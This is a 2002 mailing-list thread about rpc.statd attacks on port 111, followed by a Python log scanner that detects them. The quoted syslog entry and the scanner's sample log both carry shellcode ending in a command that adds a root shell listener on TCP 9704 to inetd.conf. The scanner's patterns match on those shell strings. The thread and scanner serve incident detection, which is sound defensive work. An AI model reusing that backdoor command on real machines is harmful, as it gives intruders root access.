RE: [cobalt-users] Port 111 Attack
- Subject: RE: [cobalt-users] Port 111 Attack
- From: "John Adair" <J.Adair@xxxxxxxxxxxxxxxx>
- Date: Wed Jan 9 09:48:21 2002
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
Hello,
There were a few vulnerabilities found in the rpc.statd daemon. This
vulnerability was used by some worms to use an automated process of rooting
Linux based machines. Your syslog should display the following if you were
indeed attacked (not just scanned) -
<syslog>
Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname
containing '/': ^D^D^E^E^F
^F^G^G08049f10
bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f
20656d61 746e6f63 696e6961 2720676e 203a272f
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000
00000000000000000000000000000000000000000000000000000000000000000000000000bf
fff7
0400000000000000000000000000000000000000000000000bffff7050000bffff7060000000
0000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v
<83> <8D>^(<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^
1<83>
<88>F'<88>F*<83> <88>F<89>F+,
<89><8D>N<8D>V<80>1<89>@<80>/bin
/sh -c echo 9704 stream tcp
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
</syslog>
Notice how the shellcode creates a backdoor on TCP 9704. This specific
exploit code only targets x86 based architectures.
http://www.cert.org/advisories/CA-2000-17.html
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0018
> -----Original Message-----
> From: cobalt-users-admin@xxxxxxxxxxxxxxx
> [mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of Sim Ayers
> Sent: Tuesday, January 08, 2002 10:58 AM
> To: cobalt-users@xxxxxxxxxxxxxxx
> Subject: [cobalt-users] Port 111 Attack
>
>
> I finally got around to installing PortSentry last week and because of
> PortSentry
> being installed on our RQ4 the Port 111 Attack was caught and
> taken care of.
>
> Output from LogCheck and portsentry
>
> Active System Attack Alerts
> =-=-=-=-=-=-=-=-=-=-=-=-=-=
> Jan 7 22:37:53 admin portsentry[24275]: attackalert: Connect
> from host:
> quantum2.edurus.com/208.131.42.26 to TCP port: 111
> Jan 7 22:37:53 admin portsentry[24275]: attackalert: Host
> 208.131.42.26 has
> been blocked via wrappers with string: "ALL: 208.131.42.26"
> Jan 7 22:37:53 admin portsentry[24275]: attackalert: Host
> 208.131.42.26 has
> been blocked via dropped route using command: "/sbin/route add -host
> 208.131.42.26 reject">
>
>
> To anyone on the list who hasn't installed PortSentry
>
> Installing SSH2, IPChains, Portsentry, Logcheck, Tripwire, Chkrootkit,
> Lionfind, Whois, lcap
>
> http://list.cobalt.com/pipermail/cobalt-users/2001-April/042023.html
>
> Some of the install instructions from that page that do not
> work are only
> because
> of newer versions available. If wget fails then check for a
> newer version.
>
>
> More info on Port 111 (rpc.statd)
>
> http://www1.dshield.org/ports/port111.html
>
>
> One happy puppy,
> Sim
>
> _______________________________________________
> cobalt-users mailing list
> cobalt-users@xxxxxxxxxxxxxxx
> To Subscribe or Unsubscribe, please go to:
> http://list.cobalt.com/mailman/listinfo/cobalt-users
>
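As an added example (not part of either message above, and not code from Cobalt, PortSentry or LogCheck), the following Python script shows how a defender could pick the two indicators discussed in this thread out of a syslog file: the rpc.statd "SM_MON request for hostname containing '/'" entry that John quotes (graded higher when it also carries a NOP sled, which syslog renders as a run of `<90>`, or the inetd.conf/shell strings from the payload), and the portsentry "attackalert" connect and block lines that Sim quotes. The sample log lines are constructed for this example and modeled on the ones in the thread, with the e-mail's wrapped rpc.statd entry joined back into the single line syslog actually writes; the hostnames and the 192.0.2.x addresses are placeholders.

```python
import re
from typing import Dict, List, Optional

# Classic syslog prefix: "Mon DD HH:MM:SS host prog[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<prog>[\w.\-]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)

# rpc.statd logs this message when a client name contains '/'; a legitimate
# hostname never does, so the message itself is already worth a look.
STATD_MARKER = "SM_MON request for hostname containing '/'"
# syslog escapes non-printable bytes as <hex>; a long run of <90> (x86 NOP) is a sled.
NOP_SLED_RE = re.compile(r"(?:<90>){8,}")
# Post-exploitation strings seen in the thread's payload: a shell and an inetd.conf edit.
PAYLOAD_STRINGS = ("/bin/sh", "/etc/inetd.conf", "sh -i")

# PortSentry's two alert shapes quoted in the thread.
PORTSENTRY_CONNECT_RE = re.compile(
    r"attackalert: Connect from host: (?P<name>\S+)/(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"to (?P<proto>TCP|UDP) port: (?P<port>\d+)"
)
PORTSENTRY_BLOCK_RE = re.compile(
    r"attackalert: Host (?P<ip>\S+) has been blocked via (?P<how>wrappers|dropped route)"
)


def parse_syslog(line: str) -> Optional[Dict[str, str]]:
    """Split a syslog line into its fields, or return None if it is not one."""
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None


def classify(line: str) -> Optional[Dict[str, object]]:
    """Return a finding dict for a line that matches one of the indicators, else None."""
    rec = parse_syslog(line)
    if rec is None:
        return None
    prog, msg = rec["prog"], rec["msg"]

    if prog == "rpc.statd" and STATD_MARKER in msg:
        nop = NOP_SLED_RE.search(msg) is not None
        payload = [s for s in PAYLOAD_STRINGS if s in msg]
        # A '/' in the name alone is suspicious; a sled or payload text is an attempt.
        severity = "exploit-attempt" if (nop or payload) else "suspicious"
        return {"kind": "rpc.statd-format-string", "host": rec["host"],
                "severity": severity, "nop_sled": nop, "payload_strings": payload}

    if prog == "portsentry":
        m = PORTSENTRY_CONNECT_RE.search(msg)
        if m:
            return {"kind": "portsentry-connect", "host": rec["host"], "src_name": m["name"],
                    "src_ip": m["ip"], "proto": m["proto"], "port": int(m["port"])}
        m = PORTSENTRY_BLOCK_RE.search(msg)
        if m:
            return {"kind": "portsentry-block", "host": rec["host"],
                    "src_ip": m["ip"], "method": m["how"]}
    return None


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run classify() over a log and keep only the lines that produced a finding."""
    return [f for f in (classify(ln) for ln in lines) if f is not None]


# Constructed sample log, modeled on the entries quoted in the thread.
SAMPLE_LOG = [
    # The rpc.statd entry as syslog writes it: one line, with an escaped NOP sled.
    "Aug 12 17:13:08 victim rpc.statd[410]: SM_MON request for hostname containing '/': "
    "^D^D^E^E^F^F^G^G08049f10 bffff754 " + "<90>" * 20 + "K^<89>v /bin/sh -c echo 9704 "
    "stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd",
    # A '/' in the client name but no payload: flagged, but at lower severity.
    "Aug 12 17:20:01 victim rpc.statd[410]: SM_MON request for hostname containing '/': nfs/client",
    # PortSentry connect and block alerts (placeholder scanner name and address).
    "Jan  7 22:37:53 admin portsentry[24275]: attackalert: Connect from host: "
    "scanner.example.net/192.0.2.10 to TCP port: 111",
    'Jan  7 22:37:53 admin portsentry[24275]: attackalert: Host 192.0.2.10 has been '
    'blocked via wrappers with string: "ALL: 192.0.2.10"',
    # Unrelated traffic that must not produce a finding.
    "Jan  7 22:37:54 admin sshd[1000]: Accepted publickey for alice from 192.0.2.20 port 50000",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Feeding a real `/var/log/messages` through `scan()` line by line is enough to use it as a LogCheck-style filter; the severity split matters in practice because the bare "hostname containing '/'" message also appears for scanners and broken clients, while the sled and inetd.conf strings only appear when a payload was actually delivered.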